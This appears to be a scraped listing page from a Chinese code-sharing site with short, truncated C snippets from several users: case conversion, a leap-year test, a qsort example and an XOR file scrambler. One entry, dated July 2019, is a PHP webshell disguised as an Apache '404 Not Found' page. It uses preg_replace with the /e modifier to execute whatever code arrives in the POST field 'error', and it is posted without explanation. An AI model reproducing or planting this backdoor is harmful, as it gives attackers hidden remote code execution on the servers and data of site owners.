#include<stdio.h>
int main()
{
char letter;
printf("请输入一个字母:");
scanf("%c",&letter);
if((letter>='a')&&(letter<='z')){
printf("%c是小写字母,",letter);
printf("对应的大写字母是:%c\n",letter-('a'-'A'));
}else if((letter>='A')&&(letter<='Z')){
printf("%c 是大写字母,",letter);
printf("对应的小写字母是:%c\n",letter-('A'-'a'));
......................
阅读全部
|
大神哦
贴于 2019年8月30日 11:06
hide
bbsi
#include<stdio.h>
int main()
{
int year;
printf("请输入年份:");
scanf("%d",&year);
if(year<=0){
printf("非法数据");}
else if((year%400==0)||((year%100!=0)&&(year%4==0))) {
printf("%d年份是闰年",year);}
else{
printf("%d年份是平年",year);}
......................
阅读全部
|
大神哦
贴于 2019年8月30日 10:53
hide
bbsi
#include <stdio.h>
#include <stdlib.h>
#define LENGTH 3
int main(void) {
double *map(double (*)(double), const double *, int); // 映射函数
double pow2(double);
double * p = map(pow2, (double[LENGTH]){1.2, 2.8, 3.4}, LENGTH);
for (int i = 0; i < LENGTH; ++i) {
......................
阅读全部
|
沈和
贴于 2019年8月28日 08:05
hide
bbsi
#include <stdio.h>
#include <iostream>
#include <math.h>
float f(float x, float y, float z) {
float a = x * x + 9.0f / 4.0f * y * y + z * z - 1;
return a * a * a - x * x * z * z * z - 9.0f / 80.0f * y * y * z * z * z;
}
float h(float x, float z) {
for (float y = 1.0f; y >= 0.0f; y -= 0.001f)
if (f(x, y, z) <= 0.0f) {
......................
阅读全部
|
快乐的小屁孩
贴于 2019年8月22日 13:33
hide
bbsi
/*
input:
output:
*/
#include<stdio.h>
#include<stdlib.h>
using namespace std;
int cmp(const void* A, const void* B){
return *(int*)A - *(int*)B;
}
int main(){
int n,arr[1001];
......................
阅读全部
|
擎天柱
贴于 2019年8月21日 22:13
hide
bbsi
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
阅读全部
|
JYF789JKL
贴于 2019年7月5日 15:30
hide
bbsi
#include <stdio.h>
#define IN "in.txt"
#define OUT "out.txt"
#define KEY 0x5C//宏定义
void scrambler(const char *in, const char *out, unsigned char key)
{
FILE *i, *o;//定义指向FILE类型的指针变量
int c;
i = fopen(in, "rb");
o = fopen(out, "wb");//打开文件,因为假定可读写,所以对是否成功不做判断
while((c = fgetc(i))!=EOF)//读入字符直到文件结尾
......................
阅读全部
|
石碣
贴于 2019年6月25日 00:04
hide
bbsi